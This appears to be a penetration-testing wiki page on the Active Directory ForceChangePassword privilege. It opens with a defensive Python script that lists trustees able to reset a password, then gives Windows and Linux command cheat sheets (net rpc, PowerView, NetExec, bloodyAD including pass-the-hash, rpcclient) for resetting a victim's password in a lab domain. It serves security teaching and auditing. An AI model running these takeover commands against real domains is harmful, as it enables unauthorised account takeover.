# ForceChangePassword

If the attacker controls an account that has `GenericAll`, `AllExtendedRights`, or `User-Force-Change-Password` over the target account, then the target's password can be modified.
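
To audit which principals hold one of these rights over an account, the added example below (not part of the original page) parses an SDDL string exported from a user object's security descriptor and lists the trustees whose allow ACEs permit a password reset. The function names, the sample descriptor, and its SIDs are constructed for illustration.

```python
import re

# Schema GUID of the User-Force-Change-Password extended right.
FORCE_CHANGE_PW = "00299570-246d-11d0-a768-00aa006e0529"
# SDDL two-letter rights mapped to directory-object access-mask bits.
BITS = {"CC": 0x1, "DC": 0x2, "LC": 0x4, "SW": 0x8, "RP": 0x10, "WP": 0x20,
        "DT": 0x40, "LO": 0x80, "CR": 0x100, "SD": 0x10000, "RC": 0x20000,
        "WD": 0x40000, "WO": 0x80000, "GA": 0x10000000}
FULL_CONTROL, CONTROL_ACCESS, GENERIC_ALL = 0xF01FF, 0x100, 0x10000000

def mask_of(rights):
    """Convert an SDDL rights field ('RPWPCR' or '0x100') to an integer mask."""
    if rights.lower().startswith("0x"):
        return int(rights, 16)
    return sum(BITS.get(code, 0) for code in set(re.findall("..", rights)))

def password_reset_trustees(sddl):
    """Return sorted (trustee, reason) pairs for allow ACEs that permit a reset."""
    dacl = re.search(r"D:[A-Z_]*((?:\([^)]*\))*)", sddl)
    found = set()
    for ace in re.findall(r"\(([^)]*)\)", dacl.group(1) if dacl else ""):
        fields = ace.split(";")
        if len(fields) < 6:
            continue
        ace_type, flags, rights, obj_guid, _, trustee = fields[:6]
        if ace_type not in ("A", "OA") or "IO" in re.findall("..", flags):
            continue  # deny and inherit-only ACEs grant nothing on this object
        mask = mask_of(rights)
        if not obj_guid and (mask & GENERIC_ALL or (mask & FULL_CONTROL) == FULL_CONTROL):
            found.add((trustee, "GenericAll"))
        elif mask & CONTROL_ACCESS and not obj_guid:
            found.add((trustee, "AllExtendedRights"))
        elif mask & CONTROL_ACCESS and obj_guid.lower() == FORCE_CHANGE_PW:
            found.add((trustee, "User-Force-Change-Password"))
    return sorted(found)

# Constructed sample descriptor; the SIDs are made-up placeholders.
DOM = "S-1-5-21-1111111111-2222222222-3333333333"
SAMPLE_SDDL = (
    "O:DAG:DAD:AI"
    "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;DA)"                    # full control
    f"(OA;;CR;{FORCE_CHANGE_PW};;{DOM}-1104)"                 # reset right only
    "(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;WD)"       # User-Change-Password
    f"(A;;CR;;;{DOM}-1105)"                                   # all extended rights
    f"(OA;CIIO;CR;{FORCE_CHANGE_PW};;{DOM}-1106)"             # inherit-only
    f"(OD;;CR;{FORCE_CHANGE_PW};;{DOM}-1107)"                 # deny ACE
    "S:AI(AU;SA;WP;;;WD)")

print(password_reset_trustees(SAMPLE_SDDL))
```

Trustees are reported exactly as they appear in the DACL; group membership is not expanded and conditional ACEs are not handled.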

## Windows

{% hint style="warning" %}
The `net user` command requires administrative privileges.
{% endhint %}

{% code overflow="wrap" %}

```shellscript
#---------------------#
# Living off the Land #
#---------------------#

# Net
net user bob Passw0rd123! /domain

# Net RPC
net rpc password "bob" "newP@ssword123!" -U "marvel.local"/"x7331"%"Passw0rd123!" -S "dc01.marvel.local"

# AD Module
Set-ADAccountPassword bob -NewPassword $((ConvertTo-SecureString 'NewPassword123!' -AsPlainText -Force)) -Reset -Verbose

#-----------#
# PowerView #
#-----------#

# Create a PSCredential object for the current user
$SecPassword = ConvertTo-SecureString 'Passw0rd123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('marvel\x7331', $SecPassword)

# Change the user's password
Set-DomainUserPassword -Identity bob -AccountPassword $((ConvertTo-SecureString 'NewPassw0rd123!' -AsPlainText -Force)) -Credential $Cred -Verbose
```

{% endcode %}

## Linux

This permission can be leveraged from Linux using [NetExec](https://github.com/Pennyw0rth/NetExec), [BloodyAD](https://github.com/CravateRouge/bloodyAD), [`net`](https://linux.die.net/man/8/net), or [`rpcclient`](https://www.kali.org/tools/samba/#rpcclient).

{% code overflow="wrap" %}

```bash
# NetExec
nxc smb 10.10.10.1 -u x7331 -p 'Passw0rd123!' -M change-password -o USER=bob NEWPASS='NewPassword123!'

# BloodyAD with plaintext credentials
bloodyAD -d marvel.local -u x7331 -p 'Passw0rd123!' --host dc01.marvel.local set password bob 'NewPassword123!'

# BloodyAD with NTLM hash
bloodyAD --host 10.10.10.1 -d marvel.local -u x7331 -p :70016778cb0524c799ac25b439bd6a31 set password bob 'NewPassw0rd123!'

# Net
net rpc password bob 'newPassword123!' -U marvel.local/x7331%'Passw0rd123!' -S 10.10.205.81

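# rpcclient (lines starting with ">" are entered at the rpcclient prompt)
rpcclient -U marvel/x7331%'Passw0rd123!' 10.10.205.81
> setuserinfo2 bob 23 'newPassword123!'
# OR (chgpasswd3 requires the target's current password)
> chgpasswd3 bob 'OldPassword123!' 'NewPassw0rd123!'
> exit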
```

{% endcode %}
